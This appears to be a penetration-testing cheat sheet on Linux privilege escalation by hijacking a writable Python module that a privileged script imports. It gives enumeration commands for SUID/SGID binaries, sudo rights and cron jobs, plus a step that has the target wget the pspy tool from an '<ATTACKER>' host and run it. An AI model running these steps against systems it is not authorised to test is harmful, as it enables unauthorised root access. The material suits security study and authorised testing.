PRIMARY CATEGORY → LINUX PRIVESC
Write Permissions on Imported Python Module
Requirements
- The Python Script must be executed by a user with more privileges that the current one
- The current user must have read permissions on the Python Script
- The current user must have write permissions on the Module importing the Python Script
Scenarios & Cases
The situation that described by the first requirement can be projected in the following scenarios →
SUID Binary
The attacker finds a binary which has the SUID special permission enabled
find / -perm 4755 -type f -ls 2> /dev/null
find / -perm 4755 -user root -type f -ls 2> /dev/null # Root as File OwnerTherefore, It only remains to find the Python Modules that are being imported in the Python Script
SGID Binary
The same as here
find / -perm 2755 -type f -ls 2> /dev/null
find / -perm 2755 -group root -type f -ls 2> /dev/null # Root as File OwnerSudo Privilege
The attacker checks if the current user has any type of sudo privileges as follows →
sudo -lIt appears that the user has privileges to execute as Any User (ALL) a particular Python Script
So, the same applies here, if the attacker has read permissions on the Python Script, just examine its content to see what modules it imports
Cron Job
There may be a Cron Job or task that is being executed recurrently on the system by a user with more privilieges than the current one
Download and transfer to the target a tool like PsPy to monitor them all
- From the Attacker
curl --silent --request GET --remote-name --location "https://github.com/DominicBreuker/pspy/releases/download/vX.X.X/pspy64"python3 -m http.server <PORT>- From the Target
wget "http://<ATTACKER>:<PORT>/pspy64" -O pspy64chmod 700 !$ && ./pspy64Once the attacker finds that mentioned Cron Job which executes a Python Script, he just need read permissions on it to check its content and see what Python Modules it imports
Important
As mentioned earlier, the current user must have write permissions on the imported python module in order to modify it and escalate privileges when the privileged user executes the script